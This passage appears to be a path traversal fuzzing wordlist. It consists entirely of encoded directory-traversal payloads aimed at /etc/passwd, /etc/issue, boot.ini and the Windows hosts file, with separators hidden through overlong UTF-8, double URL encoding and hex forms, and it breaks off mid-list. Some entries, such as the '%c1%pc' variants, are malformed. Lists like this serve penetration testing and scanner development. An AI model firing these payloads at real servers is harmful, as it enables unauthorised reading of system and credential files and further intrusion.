-??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cetc%25c1%259cissue -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cboot.ini -??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259c??%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -??%25c0%25afetc%25c0%25afpasswd -??%25c0%25afetc%25c0%25afissue -??%25c0%25afboot.ini -??%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -??%25c0%25af??%25c0%25afetc%25c0%25afpasswd -??%25c0%25af??%25c0%25afetc%25c0%25afissue -??%25c0%25af??%25c0%25afboot.ini -??%25c0%25af??%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afpasswd -??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afissue -??%25c0%25af??%25c0%25af??%25c0%25afboot.ini -??%25c0%25af??%25c0%25af??%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afpasswd -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afissue -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afboot.ini -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afpasswd -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afissue -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afboot.ini -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afpasswd -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afetc%25c0%25afissue -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afboot.ini -??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25af??%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -??%f0%80%80%afetc%f0%80%80%afpasswd -??%f0%80%80%afetc%f0%80%80%afissue -??%f0%80%80%afboot.ini -??%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afpasswd -??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afissue -??%f0%80%80%af??%f0%80%80%afboot.ini -??%f0%80%80%af??%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afpasswd -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afissue -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afboot.ini -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afpasswd -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afissue -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afboot.ini -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afpasswd -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afissue -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afboot.ini -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afpasswd -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afetc%f0%80%80%afissue -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afboot.ini -??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%af??%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -??%f8%80%80%80%afetc%f8%80%80%80%afpasswd -??%f8%80%80%80%afetc%f8%80%80%80%afissue -??%f8%80%80%80%afboot.ini -??%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afpasswd -??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afissue -??%f8%80%80%80%af??%f8%80%80%80%afboot.ini -??%f8%80%80%80%af??%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afpasswd -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afissue -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afboot.ini -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afpasswd -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afissue -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afboot.ini -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afpasswd -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afissue -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afboot.ini -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afpasswd -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afetc%f8%80%80%80%afissue -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afboot.ini -??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%af??%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -?./etc/passwd -?./etc/issue -?./boot.ini -?./windows/system32/drivers/etc/hosts -?./?./etc/passwd -?./?./etc/issue -?./?./boot.ini -?./?./windows/system32/drivers/etc/hosts -?./?./?./etc/passwd -?./?./?./etc/issue -?./?./?./boot.ini -?./?./?./windows/system32/drivers/etc/hosts -?./?./?./?./etc/passwd -?./?./?./?./etc/issue -?./?./?./?./boot.ini -?./?./?./?./windows/system32/drivers/etc/hosts -?./?./?./?./?./etc/passwd -?./?./?./?./?./etc/issue -?./?./?./?./?./boot.ini -?./?./?./?./?./windows/system32/drivers/etc/hosts -?./?./?./?./?./?./etc/passwd -?./?./?./?./?./?./etc/issue -?./?./?./?./?./?./boot.ini -?./?./?./?./?./?./windows/system32/drivers/etc/hosts -?.\etc\passwd -?.\etc\issue -?.\boot.ini -?.\windows\system32\drivers\etc\hosts -?.\?.\etc\passwd -?.\?.\etc\issue -?.\?.\boot.ini -?.\?.\windows\system32\drivers\etc\hosts -?.\?.\?.\etc\passwd -?.\?.\?.\etc\issue -?.\?.\?.\boot.ini -?.\?.\?.\windows\system32\drivers\etc\hosts -?.\?.\?.\?.\etc\passwd -?.\?.\?.\?.\etc\issue -?.\?.\?.\?.\boot.ini -?.\?.\?.\?.\windows\system32\drivers\etc\hosts -?.\?.\?.\?.\?.\etc\passwd -?.\?.\?.\?.\?.\etc\issue -?.\?.\?.\?.\?.\boot.ini -?.\?.\?.\?.\?.\windows\system32\drivers\etc\hosts -?.\?.\?.\?.\?.\?.\etc\passwd -?.\?.\?.\?.\?.\?.\etc\issue -?.\?.\?.\?.\?.\?.\boot.ini -?.\?.\?.\?.\?.\?.\windows\system32\drivers\etc\hosts -?.%2fetc%2fpasswd -?.%2fetc%2fissue -?.%2fboot.ini -?.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -?.%2f?.%2fetc%2fpasswd -?.%2f?.%2fetc%2fissue -?.%2f?.%2fboot.ini -?.%2f?.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -?.%2f?.%2f?.%2fetc%2fpasswd -?.%2f?.%2f?.%2fetc%2fissue -?.%2f?.%2f?.%2fboot.ini -?.%2f?.%2f?.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -?.%2f?.%2f?.%2f?.%2fetc%2fpasswd -?.%2f?.%2f?.%2f?.%2fetc%2fissue -?.%2f?.%2f?.%2f?.%2fboot.ini -?.%2f?.%2f?.%2f?.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -?.%2f?.%2f?.%2f?.%2f?.%2fetc%2fpasswd -?.%2f?.%2f?.%2f?.%2f?.%2fetc%2fissue -?.%2f?.%2f?.%2f?.%2f?.%2fboot.ini -?.%2f?.%2f?.%2f?.%2f?.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -?.%2f?.%2f?.%2f?.%2f?.%2f?.%2fetc%2fpasswd -?.%2f?.%2f?.%2f?.%2f?.%2f?.%2fetc%2fissue -?.%2f?.%2f?.%2f?.%2f?.%2f?.%2fboot.ini -?.%2f?.%2f?.%2f?.%2f?.%2f?.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -?.%5cetc%5cpasswd -?.%5cetc%5cissue -?.%5cboot.ini -?.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -?.%5c?.%5cetc%5cpasswd -?.%5c?.%5cetc%5cissue -?.%5c?.%5cboot.ini -?.%5c?.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -?.%5c?.%5c?.%5cetc%5cpasswd -?.%5c?.%5c?.%5cetc%5cissue -?.%5c?.%5c?.%5cboot.ini -?.%5c?.%5c?.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -?.%5c?.%5c?.%5c?.%5cetc%5cpasswd -?.%5c?.%5c?.%5c?.%5cetc%5cissue -?.%5c?.%5c?.%5c?.%5cboot.ini -?.%5c?.%5c?.%5c?.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -?.%5c?.%5c?.%5c?.%5c?.%5cetc%5cpasswd -?.%5c?.%5c?.%5c?.%5c?.%5cetc%5cissue -?.%5c?.%5c?.%5c?.%5c?.%5cboot.ini -?.%5c?.%5c?.%5c?.%5c?.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -?.%5c?.%5c?.%5c?.%5c?.%5c?.%5cetc%5cpasswd -?.%5c?.%5c?.%5c?.%5c?.%5c?.%5cetc%5cissue -?.%5c?.%5c?.%5c?.%5c?.%5c?.%5cboot.ini -?.%5c?.%5c?.%5c?.%5c?.%5c?.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -?.0x2fetc0x2fpasswd -?.0x2fetc0x2fissue -?.0x2fboot.ini -?.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -?.0x2f?.0x2fetc0x2fpasswd -?.0x2f?.0x2fetc0x2fissue -?.0x2f?.0x2fboot.ini -?.0x2f?.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -?.0x2f?.0x2f?.0x2fetc0x2fpasswd -?.0x2f?.0x2f?.0x2fetc0x2fissue -?.0x2f?.0x2f?.0x2fboot.ini -?.0x2f?.0x2f?.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -?.0x2f?.0x2f?.0x2f?.0x2fetc0x2fpasswd -?.0x2f?.0x2f?.0x2f?.0x2fetc0x2fissue -?.0x2f?.0x2f?.0x2f?.0x2fboot.ini -?.0x2f?.0x2f?.0x2f?.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fetc0x2fpasswd -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fetc0x2fissue -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fboot.ini -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fetc0x2fpasswd -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fetc0x2fissue -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fboot.ini -?.0x2f?.0x2f?.0x2f?.0x2f?.0x2f?.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -?.0x5cetc0x5cpasswd -?.0x5cetc0x5cissue -?.0x5cboot.ini -?.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -?.0x5c?.0x5cetc0x5cpasswd -?.0x5c?.0x5cetc0x5cissue -?.0x5c?.0x5cboot.ini -?.0x5c?.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -?.0x5c?.0x5c?.0x5cetc0x5cpasswd -?.0x5c?.0x5c?.0x5cetc0x5cissue -?.0x5c?.0x5c?.0x5cboot.ini -?.0x5c?.0x5c?.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -?.0x5c?.0x5c?.0x5c?.0x5cetc0x5cpasswd -?.0x5c?.0x5c?.0x5c?.0x5cetc0x5cissue -?.0x5c?.0x5c?.0x5c?.0x5cboot.ini -?.0x5c?.0x5c?.0x5c?.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cetc0x5cpasswd -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cetc0x5cissue -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cboot.ini -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cetc0x5cpasswd -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cetc0x5cissue -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cboot.ini -?.0x5c?.0x5c?.0x5c?.0x5c?.0x5c?.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -?.%252fetc%252fpasswd -?.%252fetc%252fissue -?.%252fboot.ini -?.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -?.%252f?.%252fetc%252fpasswd -?.%252f?.%252fetc%252fissue -?.%252f?.%252fboot.ini -?.%252f?.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -?.%252f?.%252f?.%252fetc%252fpasswd -?.%252f?.%252f?.%252fetc%252fissue -?.%252f?.%252f?.%252fboot.ini -?.%252f?.%252f?.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -?.%252f?.%252f?.%252f?.%252fetc%252fpasswd -?.%252f?.%252f?.%252f?.%252fetc%252fissue -?.%252f?.%252f?.%252f?.%252fboot.ini -?.%252f?.%252f?.%252f?.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -?.%252f?.%252f?.%252f?.%252f?.%252fetc%252fpasswd -?.%252f?.%252f?.%252f?.%252f?.%252fetc%252fissue -?.%252f?.%252f?.%252f?.%252f?.%252fboot.ini -?.%252f?.%252f?.%252f?.%252f?.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -?.%252f?.%252f?.%252f?.%252f?.%252f?.%252fetc%252fpasswd -?.%252f?.%252f?.%252f?.%252f?.%252f?.%252fetc%252fissue -?.%252f?.%252f?.%252f?.%252f?.%252f?.%252fboot.ini -?.%252f?.%252f?.%252f?.%252f?.%252f?.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -?.%255cetc%255cpasswd -?.%255cetc%255cissue -?.%255cboot.ini -?.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -?.%255c?.%255cetc%255cpasswd -?.%255c?.%255cetc%255cissue -?.%255c?.%255cboot.ini -?.%255c?.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -?.%255c?.%255c?.%255cetc%255cpasswd -?.%255c?.%255c?.%255cetc%255cissue -?.%255c?.%255c?.%255cboot.ini -?.%255c?.%255c?.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -?.%255c?.%255c?.%255c?.%255cetc%255cpasswd -?.%255c?.%255c?.%255c?.%255cetc%255cissue -?.%255c?.%255c?.%255c?.%255cboot.ini -?.%255c?.%255c?.%255c?.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -?.%255c?.%255c?.%255c?.%255c?.%255cetc%255cpasswd -?.%255c?.%255c?.%255c?.%255c?.%255cetc%255cissue -?.%255c?.%255c?.%255c?.%255c?.%255cboot.ini -?.%255c?.%255c?.%255c?.%255c?.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -?.%255c?.%255c?.%255c?.%255c?.%255c?.%255cetc%255cpasswd -?.%255c?.%255c?.%255c?.%255c?.%255c?.%255cetc%255cissue -?.%255c?.%255c?.%255c?.%255c?.%255c?.%255cboot.ini -?.%255c?.%255c?.%255c?.%255c?.%255c?.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -?.%c0%2fetc%c0%2fpasswd -?.%c0%2fetc%c0%2fissue -?.%c0%2fboot.ini -?.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -?.%c0%2f?.%c0%2fetc%c0%2fpasswd -?.%c0%2f?.%c0%2fetc%c0%2fissue -?.%c0%2f?.%c0%2fboot.ini -?.%c0%2f?.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fpasswd -?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fissue -?.%c0%2f?.%c0%2f?.%c0%2fboot.ini -?.%c0%2f?.%c0%2f?.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fpasswd -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fissue -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fboot.ini -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fpasswd -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fissue -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fboot.ini -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fpasswd -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fetc%c0%2fissue -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fboot.ini -?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2f?.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -?.%c0%afetc%c0%afpasswd -?.%c0%afetc%c0%afissue -?.%c0%afboot.ini -?.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -?.%c0%af?.%c0%afetc%c0%afpasswd -?.%c0%af?.%c0%afetc%c0%afissue -?.%c0%af?.%c0%afboot.ini -?.%c0%af?.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -?.%c0%af?.%c0%af?.%c0%afetc%c0%afpasswd -?.%c0%af?.%c0%af?.%c0%afetc%c0%afissue -?.%c0%af?.%c0%af?.%c0%afboot.ini -?.%c0%af?.%c0%af?.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -?.%c0%af?.%c0%af?.%c0%af?.%c0%afetc%c0%afpasswd -?.%c0%af?.%c0%af?.%c0%af?.%c0%afetc%c0%afissue -?.%c0%af?.%c0%af?.%c0%af?.%c0%afboot.ini -?.%c0%af?.%c0%af?.%c0%af?.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afetc%c0%afpasswd -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afetc%c0%afissue -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afboot.ini -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afetc%c0%afpasswd -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afetc%c0%afissue -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afboot.ini -?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%af?.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -?.%c0%5cetc%c0%5cpasswd -?.%c0%5cetc%c0%5cissue -?.%c0%5cboot.ini -?.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -?.%c0%5c?.%c0%5cetc%c0%5cpasswd -?.%c0%5c?.%c0%5cetc%c0%5cissue -?.%c0%5c?.%c0%5cboot.ini -?.%c0%5c?.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cpasswd -?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cissue -?.%c0%5c?.%c0%5c?.%c0%5cboot.ini -?.%c0%5c?.%c0%5c?.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cpasswd -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cissue -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cboot.ini -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cpasswd -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cissue -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cboot.ini -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cpasswd -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cetc%c0%5cissue -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cboot.ini -?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5c?.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -?.%c1%9cetc%c1%9cpasswd -?.%c1%9cetc%c1%9cissue -?.%c1%9cboot.ini -?.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -?.%c1%9c?.%c1%9cetc%c1%9cpasswd -?.%c1%9c?.%c1%9cetc%c1%9cissue -?.%c1%9c?.%c1%9cboot.ini -?.%c1%9c?.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd -?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue -?.%c1%9c?.%c1%9c?.%c1%9cboot.ini -?.%c1%9c?.%c1%9c?.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cboot.ini -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cboot.ini -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cpasswd -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cetc%c1%9cissue -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cboot.ini -?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9c?.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -?.%c1%pcetc%c1%pcpasswd -?.%c1%pcetc%c1%pcissue -?.%c1%pcboot.ini -?.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -?.%c1%pc?.%c1%pcetc%c1%pcpasswd -?.%c1%pc?.%c1%pcetc%c1%pcissue -?.%c1%pc?.%c1%pcboot.ini -?.%c1%pc?.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd -?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue -?.%c1%pc?.%c1%pc?.%c1%pcboot.ini -?.%c1%pc?.%c1%pc?.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcboot.ini -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcboot.ini -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcpasswd -?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pc?.%c1%pcetc%c1%pcissue 